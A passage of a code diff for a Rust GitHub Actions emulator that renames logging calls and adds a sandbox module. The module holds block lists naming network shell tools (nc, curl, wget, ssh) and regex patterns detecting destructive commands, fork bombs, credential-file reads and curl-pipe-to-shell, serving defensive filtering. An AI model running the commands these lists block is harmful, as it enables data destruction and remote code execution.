match gitignore.matched(relative_path, path.is_dir()) {
|
||||
Match::Ignore(_) => {
|
||||
wrkflw_logging::debug(&format!("Skipping ignored file/directory: {path:?}"));
|
||||
continue;
|
||||
}
|
||||
Match::Whitelist(_) | Match::None => {
|
||||
// File is not ignored or explicitly whitelisted
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let file_name = match path.file_name() {
|
||||
Some(name) => name,
|
||||
None => {
|
||||
@@ -507,23 +570,19 @@ fn copy_directory_contents(source: &Path, dest: &Path) -> std::io::Result<()> {
|
||||
};
|
||||
let dest_path = dest.join(file_name);
|
||||
|
||||
// Skip hidden files (except .gitignore and .github might be useful)
|
||||
// Skip most hidden files but allow important ones
|
||||
let file_name_str = file_name.to_string_lossy();
|
||||
if file_name_str.starts_with(".")
|
||||
&& file_name_str != ".gitignore"
|
||||
&& file_name_str != ".github"
|
||||
&& !file_name_str.starts_with(".env")
|
||||
{
|
||||
continue;
|
||||
}
|
||||
|
||||
// Skip target directory for Rust projects
|
||||
if file_name_str == "target" {
|
||||
continue;
|
||||
}
|
||||
|
||||
if path.is_dir() {
|
||||
// Recursively copy subdirectories
|
||||
copy_directory_contents(&path, &dest_path)?;
|
||||
// Recursively copy subdirectories with the same gitignore
|
||||
copy_directory_contents_with_gitignore(&path, &dest_path, gitignore)?;
|
||||
} else {
|
||||
// Copy files
|
||||
fs::copy(&path, &dest_path)?;
|
||||
@@ -543,14 +602,14 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
|
||||
"latest"
|
||||
};
|
||||
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Processing action: {} @ {}",
|
||||
action_name, action_version
|
||||
));
|
||||
|
||||
// Handle specific known actions with special requirements
|
||||
if action.starts_with("cachix/install-nix-action") {
|
||||
logging::info("🔄 Emulating cachix/install-nix-action");
|
||||
wrkflw_logging::info("🔄 Emulating cachix/install-nix-action");
|
||||
|
||||
// In emulation mode, check if nix is installed
|
||||
let nix_installed = Command::new("which")
|
||||
@@ -560,56 +619,65 @@ pub async fn handle_special_action(action: &str) -> Result<(), ContainerError> {
|
||||
.unwrap_or(false);
|
||||
|
||||
if !nix_installed {
|
||||
logging::info("🔄 Emulation: Nix is required but not installed.");
|
||||
logging::info(
|
||||
wrkflw_logging::info("🔄 Emulation: Nix is required but not installed.");
|
||||
wrkflw_logging::info(
|
||||
"🔄 To use this workflow, please install Nix: https://nixos.org/download.html",
|
||||
);
|
||||
logging::info("🔄 Continuing emulation, but nix commands will fail.");
|
||||
wrkflw_logging::info("🔄 Continuing emulation, but nix commands will fail.");
|
||||
} else {
|
||||
logging::info("🔄 Emulation: Using system-installed Nix");
|
||||
wrkflw_logging::info("🔄 Emulation: Using system-installed Nix");
|
||||
}
|
||||
} else if action.starts_with("actions-rs/cargo@") {
|
||||
// For actions-rs/cargo action, ensure Rust is available
|
||||
logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust cargo action: {}", action));
|
||||
|
||||
// Verify Rust/cargo is installed
|
||||
check_command_available("cargo", "Rust/Cargo", "https://rustup.rs/");
|
||||
} else if action.starts_with("actions-rs/toolchain@") {
|
||||
// For actions-rs/toolchain action, check for Rust installation
|
||||
logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust toolchain action: {}", action));
|
||||
|
||||
check_command_available("rustc", "Rust", "https://rustup.rs/");
|
||||
} else if action.starts_with("actions-rs/fmt@") {
|
||||
// For actions-rs/fmt action, check if rustfmt is available
|
||||
logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Rust formatter action: {}", action));
|
||||
|
||||
check_command_available("rustfmt", "rustfmt", "rustup component add rustfmt");
|
||||
} else if action.starts_with("dtolnay/rust-toolchain@") {
|
||||
// For dtolnay/rust-toolchain action, check for Rust installation
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Detected dtolnay Rust toolchain action: {}",
|
||||
action
|
||||
));
|
||||
|
||||
check_command_available("rustc", "Rust", "https://rustup.rs/");
|
||||
check_command_available("cargo", "Cargo", "https://rustup.rs/");
|
||||
} else if action.starts_with("actions/setup-node@") {
|
||||
// Node.js setup action
|
||||
logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Node.js setup action: {}", action));
|
||||
|
||||
check_command_available("node", "Node.js", "https://nodejs.org/");
|
||||
} else if action.starts_with("actions/setup-python@") {
|
||||
// Python setup action
|
||||
logging::info(&format!("🔄 Detected Python setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Python setup action: {}", action));
|
||||
|
||||
check_command_available("python", "Python", "https://www.python.org/downloads/");
|
||||
} else if action.starts_with("actions/setup-java@") {
|
||||
// Java setup action
|
||||
logging::info(&format!("🔄 Detected Java setup action: {}", action));
|
||||
wrkflw_logging::info(&format!("🔄 Detected Java setup action: {}", action));
|
||||
|
||||
check_command_available("java", "Java", "https://adoptium.net/");
|
||||
} else if action.starts_with("actions/checkout@") {
|
||||
// Git checkout action - this is handled implicitly by our workspace setup
|
||||
logging::info("🔄 Detected checkout action - workspace files are already prepared");
|
||||
wrkflw_logging::info("🔄 Detected checkout action - workspace files are already prepared");
|
||||
} else if action.starts_with("actions/cache@") {
|
||||
// Cache action - can't really emulate caching effectively
|
||||
logging::info(
|
||||
wrkflw_logging::info(
|
||||
"🔄 Detected cache action - caching is not fully supported in emulation mode",
|
||||
);
|
||||
} else {
|
||||
// Generic action we don't have special handling for
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"🔄 Action '{}' has no special handling in emulation mode",
|
||||
action_name
|
||||
));
|
||||
@@ -628,12 +696,12 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
|
||||
.unwrap_or(false);
|
||||
|
||||
if !is_available {
|
||||
logging::warning(&format!("{} is required but not found on the system", name));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::warning(&format!("{} is required but not found on the system", name));
|
||||
wrkflw_logging::info(&format!(
|
||||
"To use this action, please install {}: {}",
|
||||
name, install_url
|
||||
));
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Continuing emulation, but {} commands will fail",
|
||||
name
|
||||
));
|
||||
@@ -642,7 +710,7 @@ fn check_command_available(command: &str, name: &str, install_url: &str) {
|
||||
if let Ok(output) = Command::new(command).arg("--version").output() {
|
||||
if output.status.success() {
|
||||
let version = String::from_utf8_lossy(&output.stdout);
|
||||
logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
|
||||
wrkflw_logging::info(&format!("🔄 Using system {}: {}", name, version.trim()));
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -708,7 +776,7 @@ async fn cleanup_processes() {
|
||||
};
|
||||
|
||||
for pid in processes_to_cleanup {
|
||||
logging::info(&format!("Cleaning up emulated process: {}", pid));
|
||||
wrkflw_logging::info(&format!("Cleaning up emulated process: {}", pid));
|
||||
|
||||
#[cfg(unix)]
|
||||
{
|
||||
@@ -725,7 +793,7 @@ async fn cleanup_processes() {
|
||||
let _ = Command::new("taskkill")
|
||||
.arg("/F")
|
||||
.arg("/PID")
|
||||
.arg(&pid.to_string())
|
||||
.arg(pid.to_string())
|
||||
.output();
|
||||
}
|
||||
|
||||
@@ -747,7 +815,7 @@ async fn cleanup_workspaces() {
|
||||
};
|
||||
|
||||
for workspace_path in workspaces_to_cleanup {
|
||||
logging::info(&format!(
|
||||
wrkflw_logging::info(&format!(
|
||||
"Cleaning up emulation workspace: {}",
|
||||
workspace_path.display()
|
||||
));
|
||||
@@ -755,8 +823,8 @@ async fn cleanup_workspaces() {
|
||||
// Only attempt to remove if it exists
|
||||
if workspace_path.exists() {
|
||||
match fs::remove_dir_all(&workspace_path) {
|
||||
Ok(_) => logging::info("Successfully removed workspace directory"),
|
||||
Err(e) => logging::error(&format!("Error removing workspace: {}", e)),
|
||||
Ok(_) => wrkflw_logging::info("Successfully removed workspace directory"),
|
||||
Err(e) => wrkflw_logging::error(&format!("Error removing workspace: {}", e)),
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
@@ -2,3 +2,5 @@
|
||||
|
||||
pub mod container;
|
||||
pub mod emulation;
|
||||
pub mod sandbox;
|
||||
pub mod secure_emulation;
|
||||
|
||||
672
crates/runtime/src/sandbox.rs
Normal file
672
crates/runtime/src/sandbox.rs
Normal file
@@ -0,0 +1,672 @@
|
||||
use regex::Regex;
|
||||
use std::collections::HashSet;
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::process::{Command, Stdio};
|
||||
use std::time::Duration;
|
||||
use tempfile::TempDir;
|
||||
use wrkflw_logging;
|
||||
|
||||
/// Configuration for sandbox execution
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct SandboxConfig {
|
||||
/// Maximum execution time for commands
|
||||
pub max_execution_time: Duration,
|
||||
/// Maximum memory usage in MB
|
||||
pub max_memory_mb: u64,
|
||||
/// Maximum CPU usage percentage
|
||||
pub max_cpu_percent: u64,
|
||||
/// Allowed commands (whitelist)
|
||||
pub allowed_commands: HashSet<String>,
|
||||
/// Blocked commands (blacklist)
|
||||
pub blocked_commands: HashSet<String>,
|
||||
/// Allowed file system paths (read-only)
|
||||
pub allowed_read_paths: HashSet<PathBuf>,
|
||||
/// Allowed file system paths (read-write)
|
||||
pub allowed_write_paths: HashSet<PathBuf>,
|
||||
/// Whether to enable network access
|
||||
pub allow_network: bool,
|
||||
/// Maximum number of processes
|
||||
pub max_processes: u32,
|
||||
/// Whether to enable strict mode (more restrictive)
|
||||
pub strict_mode: bool,
|
||||
}
|
||||
|
||||
impl Default for SandboxConfig {
|
||||
fn default() -> Self {
|
||||
let mut allowed_commands = HashSet::new();
|
||||
|
||||
// Basic safe commands
|
||||
allowed_commands.insert("echo".to_string());
|
||||
allowed_commands.insert("printf".to_string());
|
||||
allowed_commands.insert("cat".to_string());
|
||||
allowed_commands.insert("head".to_string());
|
||||
allowed_commands.insert("tail".to_string());
|
||||
allowed_commands.insert("grep".to_string());
|
||||
allowed_commands.insert("sed".to_string());
|
||||
allowed_commands.insert("awk".to_string());
|
||||
allowed_commands.insert("sort".to_string());
|
||||
allowed_commands.insert("uniq".to_string());
|
||||
allowed_commands.insert("wc".to_string());
|
||||
allowed_commands.insert("cut".to_string());
|
||||
allowed_commands.insert("tr".to_string());
|
||||
allowed_commands.insert("which".to_string());
|
||||
allowed_commands.insert("pwd".to_string());
|
||||
allowed_commands.insert("env".to_string());
|
||||
allowed_commands.insert("date".to_string());
|
||||
allowed_commands.insert("basename".to_string());
|
||||
allowed_commands.insert("dirname".to_string());
|
||||
|
||||
// File operations (safe variants)
|
||||
allowed_commands.insert("ls".to_string());
|
||||
allowed_commands.insert("find".to_string());
|
||||
allowed_commands.insert("mkdir".to_string());
|
||||
allowed_commands.insert("touch".to_string());
|
||||
allowed_commands.insert("cp".to_string());
|
||||
allowed_commands.insert("mv".to_string());
|
||||
|
||||
// Development tools
|
||||
allowed_commands.insert("git".to_string());
|
||||
allowed_commands.insert("cargo".to_string());
|
||||
allowed_commands.insert("rustc".to_string());
|
||||
allowed_commands.insert("rustfmt".to_string());
|
||||
allowed_commands.insert("clippy".to_string());
|
||||
allowed_commands.insert("npm".to_string());
|
||||
allowed_commands.insert("yarn".to_string());
|
||||
allowed_commands.insert("node".to_string());
|
||||
allowed_commands.insert("python".to_string());
|
||||
allowed_commands.insert("python3".to_string());
|
||||
allowed_commands.insert("pip".to_string());
|
||||
allowed_commands.insert("pip3".to_string());
|
||||
allowed_commands.insert("java".to_string());
|
||||
allowed_commands.insert("javac".to_string());
|
||||
allowed_commands.insert("maven".to_string());
|
||||
allowed_commands.insert("gradle".to_string());
|
||||
allowed_commands.insert("go".to_string());
|
||||
allowed_commands.insert("dotnet".to_string());
|
||||
|
||||
// Compression tools
|
||||
allowed_commands.insert("tar".to_string());
|
||||
allowed_commands.insert("gzip".to_string());
|
||||
allowed_commands.insert("gunzip".to_string());
|
||||
allowed_commands.insert("zip".to_string());
|
||||
allowed_commands.insert("unzip".to_string());
|
||||
|
||||
let mut blocked_commands = HashSet::new();
|
||||
|
||||
// Dangerous system commands
|
||||
blocked_commands.insert("rm".to_string());
|
||||
blocked_commands.insert("rmdir".to_string());
|
||||
blocked_commands.insert("dd".to_string());
|
||||
blocked_commands.insert("mkfs".to_string());
|
||||
blocked_commands.insert("fdisk".to_string());
|
||||
blocked_commands.insert("mount".to_string());
|
||||
blocked_commands.insert("umount".to_string());
|
||||
blocked_commands.insert("sudo".to_string());
|
||||
blocked_commands.insert("su".to_string());
|
||||
blocked_commands.insert("passwd".to_string());
|
||||
blocked_commands.insert("chown".to_string());
|
||||
blocked_commands.insert("chmod".to_string());
|
||||
blocked_commands.insert("chgrp".to_string());
|
||||
blocked_commands.insert("chroot".to_string());
|
||||
|
||||
// Network and system tools
|
||||
blocked_commands.insert("nc".to_string());
|
||||
blocked_commands.insert("netcat".to_string());
|
||||
blocked_commands.insert("wget".to_string());
|
||||
blocked_commands.insert("curl".to_string());
|
||||
blocked_commands.insert("ssh".to_string());
|
||||
blocked_commands.insert("scp".to_string());
|
||||
blocked_commands.insert("rsync".to_string());
|
||||
|
||||
// Process control
|
||||
blocked_commands.insert("kill".to_string());
|
||||
blocked_commands.insert("killall".to_string());
|
||||
blocked_commands.insert("pkill".to_string());
|
||||
blocked_commands.insert("nohup".to_string());
|
||||
blocked_commands.insert("screen".to_string());
|
||||
blocked_commands.insert("tmux".to_string());
|
||||
|
||||
// System modification
|
||||
blocked_commands.insert("systemctl".to_string());
|
||||
blocked_commands.insert("service".to_string());
|
||||
blocked_commands.insert("crontab".to_string());
|
||||
blocked_commands.insert("at".to_string());
|
||||
blocked_commands.insert("reboot".to_string());
|
||||
blocked_commands.insert("shutdown".to_string());
|
||||
blocked_commands.insert("halt".to_string());
|
||||
blocked_commands.insert("poweroff".to_string());
|
||||
|
||||
Self {
|
||||
max_execution_time: Duration::from_secs(300), // 5 minutes
|
||||
max_memory_mb: 512,
|
||||
max_cpu_percent: 80,
|
||||
allowed_commands,
|
||||
blocked_commands,
|
||||
allowed_read_paths: HashSet::new(),
|
||||
allowed_write_paths: HashSet::new(),
|
||||
allow_network: false,
|
||||
max_processes: 10,
|
||||
strict_mode: true,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Sandbox error types
|
||||
#[derive(Debug, thiserror::Error)]
|
||||
pub enum SandboxError {
|
||||
#[error("Command blocked by security policy: {command}")]
|
||||
BlockedCommand { command: String },
|
||||
|
||||
#[error("Dangerous command pattern detected: {pattern}")]
|
||||
DangerousPattern { pattern: String },
|
||||
|
||||
#[error("Path access denied: {path}")]
|
||||
PathAccessDenied { path: String },
|
||||
|
||||
#[error("Resource limit exceeded: {resource}")]
|
||||
ResourceLimitExceeded { resource: String },
|
||||
|
||||
#[error("Execution timeout after {seconds} seconds")]
|
||||
ExecutionTimeout { seconds: u64 },
|
||||
|
||||
#[error("Sandbox setup failed: {reason}")]
|
||||
SandboxSetupError { reason: String },
|
||||
|
||||
#[error("Command execution failed: {reason}")]
|
||||
ExecutionError { reason: String },
|
||||
}
|
||||
|
||||
/// Secure sandbox for executing commands in emulation mode
|
||||
pub struct Sandbox {
|
||||
config: SandboxConfig,
|
||||
workspace: TempDir,
|
||||
dangerous_patterns: Vec<Regex>,
|
||||
}
|
||||
|
||||
impl Sandbox {
|
||||
/// Create a new sandbox with the given configuration
|
||||
pub fn new(config: SandboxConfig) -> Result<Self, SandboxError> {
|
||||
let workspace = tempfile::tempdir().map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create sandbox workspace: {}", e),
|
||||
})?;
|
||||
|
||||
let dangerous_patterns = Self::compile_dangerous_patterns();
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Created new sandbox with workspace: {}",
|
||||
workspace.path().display()
|
||||
));
|
||||
|
||||
Ok(Self {
|
||||
config,
|
||||
workspace,
|
||||
dangerous_patterns,
|
||||
})
|
||||
}
|
||||
|
||||
/// Execute a command in the sandbox
|
||||
pub async fn execute_command(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
if command.is_empty() {
|
||||
return Err(SandboxError::ExecutionError {
|
||||
reason: "Empty command".to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
let command_str = command.join(" ");
|
||||
|
||||
// Step 1: Validate command
|
||||
self.validate_command(&command_str)?;
|
||||
|
||||
// Step 2: Setup sandbox environment
|
||||
let sandbox_dir = self.setup_sandbox_environment(working_dir)?;
|
||||
|
||||
// Step 3: Execute with limits
|
||||
self.execute_with_limits(command, env_vars, &sandbox_dir)
|
||||
.await
|
||||
}
|
||||
|
||||
/// Validate that a command is safe to execute
|
||||
fn validate_command(&self, command_str: &str) -> Result<(), SandboxError> {
|
||||
// Check for dangerous patterns first
|
||||
for pattern in &self.dangerous_patterns {
|
||||
if pattern.is_match(command_str) {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Blocked dangerous command pattern: {}",
|
||||
command_str
|
||||
));
|
||||
return Err(SandboxError::DangerousPattern {
|
||||
pattern: command_str.to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
// Split command by shell operators to validate each part
|
||||
let command_parts = self.split_shell_command(command_str);
|
||||
|
||||
for part in command_parts {
|
||||
let part = part.trim();
|
||||
if part.is_empty() {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Extract the base command from this part
|
||||
let base_command = part.split_whitespace().next().unwrap_or("");
|
||||
let command_name = Path::new(base_command)
|
||||
.file_name()
|
||||
.and_then(|s| s.to_str())
|
||||
.unwrap_or(base_command);
|
||||
|
||||
// Skip shell built-ins and operators
|
||||
if self.is_shell_builtin(command_name) {
|
||||
continue;
|
||||
}
|
||||
|
||||
// Check blocked commands
|
||||
if self.config.blocked_commands.contains(command_name) {
|
||||
wrkflw_logging::warning(&format!("🚫 Blocked command: {}", command_name));
|
||||
return Err(SandboxError::BlockedCommand {
|
||||
command: command_name.to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
// In strict mode, only allow whitelisted commands
|
||||
if self.config.strict_mode && !self.config.allowed_commands.contains(command_name) {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"🚫 Command not in whitelist (strict mode): {}",
|
||||
command_name
|
||||
));
|
||||
return Err(SandboxError::BlockedCommand {
|
||||
command: command_name.to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!("✅ Command validation passed: {}", command_str));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Split shell command by operators while preserving quoted strings
|
||||
fn split_shell_command(&self, command_str: &str) -> Vec<String> {
|
||||
// Simple split by common shell operators
|
||||
// This is not a full shell parser but handles most cases
|
||||
let separators = ["&&", "||", ";", "|"];
|
||||
let mut parts = vec![command_str.to_string()];
|
||||
|
||||
for separator in separators {
|
||||
let mut new_parts = Vec::new();
|
||||
for part in parts {
|
||||
let split_parts: Vec<String> = part
|
||||
.split(separator)
|
||||
.map(|s| s.trim().to_string())
|
||||
.filter(|s| !s.is_empty())
|
||||
.collect();
|
||||
new_parts.extend(split_parts);
|
||||
}
|
||||
parts = new_parts;
|
||||
}
|
||||
|
||||
parts
|
||||
}
|
||||
|
||||
/// Check if a command is a shell built-in
|
||||
fn is_shell_builtin(&self, command: &str) -> bool {
|
||||
let builtins = [
|
||||
"true", "false", "test", "[", "echo", "printf", "cd", "pwd", "export", "set", "unset",
|
||||
"alias", "history", "jobs", "fg", "bg", "wait", "read",
|
||||
];
|
||||
builtins.contains(&command)
|
||||
}
|
||||
|
||||
/// Setup isolated sandbox environment
|
||||
fn setup_sandbox_environment(&self, working_dir: &Path) -> Result<PathBuf, SandboxError> {
|
||||
let sandbox_root = self.workspace.path();
|
||||
let sandbox_workspace = sandbox_root.join("workspace");
|
||||
|
||||
// Create sandbox directory structure
|
||||
fs::create_dir_all(&sandbox_workspace).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create sandbox workspace: {}", e),
|
||||
})?;
|
||||
|
||||
// Copy allowed files to sandbox (if working_dir exists and is allowed)
|
||||
if working_dir.exists() && self.is_path_allowed(working_dir, false) {
|
||||
self.copy_safe_files(working_dir, &sandbox_workspace)?;
|
||||
}
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"Sandbox environment ready: {}",
|
||||
sandbox_workspace.display()
|
||||
));
|
||||
|
||||
Ok(sandbox_workspace)
|
||||
}
|
||||
|
||||
/// Copy files safely to sandbox, excluding dangerous files
|
||||
fn copy_safe_files(&self, source: &Path, dest: &Path) -> Result<(), SandboxError> {
|
||||
for entry in fs::read_dir(source).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to read source directory: {}", e),
|
||||
})? {
|
||||
let entry = entry.map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to read directory entry: {}", e),
|
||||
})?;
|
||||
|
||||
let path = entry.path();
|
||||
let file_name = path.file_name().and_then(|s| s.to_str()).unwrap_or("");
|
||||
|
||||
// Skip dangerous or sensitive files
|
||||
if self.should_skip_file(file_name) {
|
||||
continue;
|
||||
}
|
||||
|
||||
let dest_path = dest.join(file_name);
|
||||
|
||||
if path.is_file() {
|
||||
fs::copy(&path, &dest_path).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to copy file: {}", e),
|
||||
})?;
|
||||
} else if path.is_dir() && !self.should_skip_directory(file_name) {
|
||||
fs::create_dir_all(&dest_path).map_err(|e| SandboxError::SandboxSetupError {
|
||||
reason: format!("Failed to create directory: {}", e),
|
||||
})?;
|
||||
self.copy_safe_files(&path, &dest_path)?;
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Execute command with resource limits and monitoring
|
||||
async fn execute_with_limits(
|
||||
&self,
|
||||
command: &[&str],
|
||||
env_vars: &[(&str, &str)],
|
||||
working_dir: &Path,
|
||||
) -> Result<crate::container::ContainerOutput, SandboxError> {
|
||||
// Join command parts and execute via shell for proper handling of operators
|
||||
let command_str = command.join(" ");
|
||||
|
||||
let mut cmd = Command::new("sh");
|
||||
cmd.arg("-c");
|
||||
cmd.arg(&command_str);
|
||||
cmd.current_dir(working_dir);
|
||||
cmd.stdout(Stdio::piped());
|
||||
cmd.stderr(Stdio::piped());
|
||||
|
||||
// Set environment variables (filtered)
|
||||
for (key, value) in env_vars {
|
||||
if self.is_env_var_safe(key) {
|
||||
cmd.env(key, value);
|
||||
}
|
||||
}
|
||||
|
||||
// Add sandbox-specific environment variables
|
||||
cmd.env("WRKFLW_SANDBOXED", "true");
|
||||
cmd.env("WRKFLW_SANDBOX_MODE", "strict");
|
||||
|
||||
// Execute with timeout
|
||||
let timeout_duration = self.config.max_execution_time;
|
||||
|
||||
wrkflw_logging::info(&format!(
|
||||
"🏃 Executing sandboxed command: {} (timeout: {}s)",
|
||||
command.join(" "),
|
||||
timeout_duration.as_secs()
|
||||
));
|
||||
|
||||
let start_time = std::time::Instant::now();
|
||||
|
||||
let result = tokio::time::timeout(timeout_duration, async {
|
||||
let output = cmd.output().map_err(|e| SandboxError::ExecutionError {
|
||||
reason: format!("Command execution failed: {}", e),
|
||||
})?;
|
||||
|
||||
Ok(crate::container::ContainerOutput {
|
||||
stdout: String::from_utf8_lossy(&output.stdout).to_string(),
|
||||
stderr: String::from_utf8_lossy(&output.stderr).to_string(),
|
||||
exit_code: output.status.code().unwrap_or(-1),
|
||||
})
|
||||
})
|
||||
.await;
|
||||
|
||||
let execution_time = start_time.elapsed();
|
||||
|
||||
match result {
|
||||
Ok(output_result) => {
|
||||
wrkflw_logging::info(&format!(
|
||||
"✅ Sandboxed command completed in {:.2}s",
|
||||
execution_time.as_secs_f64()
|
||||
));
|
||||
output_result
|
||||
}
|
||||
Err(_) => {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"⏰ Sandboxed command timed out after {:.2}s",
|
||||
timeout_duration.as_secs_f64()
|
||||
));
|
||||
Err(SandboxError::ExecutionTimeout {
|
||||
seconds: timeout_duration.as_secs(),
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if a path is allowed for access
|
||||
fn is_path_allowed(&self, path: &Path, write_access: bool) -> bool {
|
||||
let abs_path = path.canonicalize().unwrap_or_else(|_| path.to_path_buf());
|
||||
|
||||
if write_access {
|
||||
self.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
} else {
|
||||
self.config
|
||||
.allowed_read_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
|| self
|
||||
.config
|
||||
.allowed_write_paths
|
||||
.iter()
|
||||
.any(|allowed| abs_path.starts_with(allowed))
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if an environment variable is safe to pass through
|
||||
fn is_env_var_safe(&self, key: &str) -> bool {
|
||||
// Block dangerous environment variables
|
||||
let dangerous_env_vars = [
|
||||
"LD_PRELOAD",
|
||||
"LD_LIBRARY_PATH",
|
||||
"DYLD_INSERT_LIBRARIES",
|
||||
"DYLD_LIBRARY_PATH",
|
||||
"PATH",
|
||||
"HOME",
|
||||
"SHELL",
|
||||
];
|
||||
|
||||
!dangerous_env_vars.contains(&key)
|
||||
}
|
||||
|
||||
/// Check if a file should be skipped during copying
|
||||
fn should_skip_file(&self, filename: &str) -> bool {
|
||||
let dangerous_files = [
|
||||
".ssh",
|
||||
".gnupg",
|
||||
".aws",
|
||||
".docker",
|
||||
"id_rsa",
|
||||
"id_ed25519",
|
||||
"credentials",
|
||||
"config",
|
||||
".env",
|
||||
".secrets",
|
||||
];
|
||||
|
||||
dangerous_files
|
||||
.iter()
|
||||
.any(|pattern| filename.contains(pattern))
|
||||
|| filename.starts_with('.') && filename != ".gitignore" && filename != ".github"
|
||||
}
|
||||
|
||||
/// Check if a directory should be skipped
|
||||
fn should_skip_directory(&self, dirname: &str) -> bool {
|
||||
let skip_dirs = [
|
||||
"target",
|
||||
"node_modules",
|
||||
".git",
|
||||
".cargo",
|
||||
".npm",
|
||||
".cache",
|
||||
"build",
|
||||
"dist",
|
||||
"tmp",
|
||||
"temp",
|
||||
];
|
||||
|
||||
skip_dirs.contains(&dirname)
|
||||
}
|
||||
|
||||
/// Compile regex patterns for dangerous command detection
|
||||
fn compile_dangerous_patterns() -> Vec<Regex> {
|
||||
let patterns = [
|
||||
r"rm\s+.*-rf?\s*/", // rm -rf /
|
||||
r"dd\s+.*of=/dev/", // dd ... of=/dev/...
|
||||
r">\s*/dev/sd[a-z]", // > /dev/sda
|
||||
r"mkfs\.", // mkfs.ext4, etc.
|
||||
r"fdisk\s+/dev/", // fdisk /dev/...
|
||||
r"mount\s+.*\s+/", // mount ... /
|
||||
r"chroot\s+/", // chroot /
|
||||
r"sudo\s+", // sudo commands
|
||||
r"su\s+", // su commands
|
||||
r"bash\s+-c\s+.*rm.*-rf", // bash -c "rm -rf ..."
|
||||
r"sh\s+-c\s+.*rm.*-rf", // sh -c "rm -rf ..."
|
||||
r"eval\s+.*rm.*-rf", // eval "rm -rf ..."
|
||||
r":\(\)\{.*;\};:", // Fork bomb
|
||||
r"/proc/sys/", // /proc/sys access
|
||||
r"/etc/passwd", // /etc/passwd access
|
||||
r"/etc/shadow", // /etc/shadow access
|
||||
r"nc\s+.*-e", // netcat with exec
|
||||
r"wget\s+.*\|\s*sh", // wget ... | sh
|
||||
r"curl\s+.*\|\s*sh", // curl ... | sh
|
||||
];
|
||||
|
||||
patterns
|
||||
.iter()
|
||||
.filter_map(|pattern| {
|
||||
Regex::new(pattern)
|
||||
.map_err(|e| {
|
||||
wrkflw_logging::warning(&format!(
|
||||
"Invalid regex pattern {}: {}",
|
||||
pattern, e
|
||||
));
|
||||
e
|
||||
})
|
||||
.ok()
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a default sandbox configuration for CI/CD workflows
|
||||
pub fn create_workflow_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(1800), // 30 minutes
|
||||
max_memory_mb: 2048, // 2GB
|
||||
max_processes: 50,
|
||||
allow_network: true,
|
||||
strict_mode: false,
|
||||
allowed_read_paths,
|
||||
allowed_write_paths,
|
||||
..Default::default()
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a strict sandbox configuration for untrusted code
|
||||
pub fn create_strict_sandbox_config() -> SandboxConfig {
|
||||
let mut allowed_read_paths = HashSet::new();
|
||||
allowed_read_paths.insert(PathBuf::from("."));
|
||||
|
||||
let mut allowed_write_paths = HashSet::new();
|
||||
allowed_write_paths.insert(PathBuf::from("."));
|
||||
|
||||
// Very limited command set
|
||||
let allowed_commands = ["echo", "cat", "ls", "pwd", "date"]
|
||||
.iter()
|
||||
.map(|s| s.to_string())
|
||||
.collect();
|
||||
|
||||
SandboxConfig {
|
||||
max_execution_time: Duration::from_secs(60), // 1 minute
|
||||
max_memory_mb: 128, // 128MB
|
||||
max_processes: 5,
|
||||
allow_network: false,
|
||||
strict_mode: true,
|
||||
allowed_read_paths,
|
||||
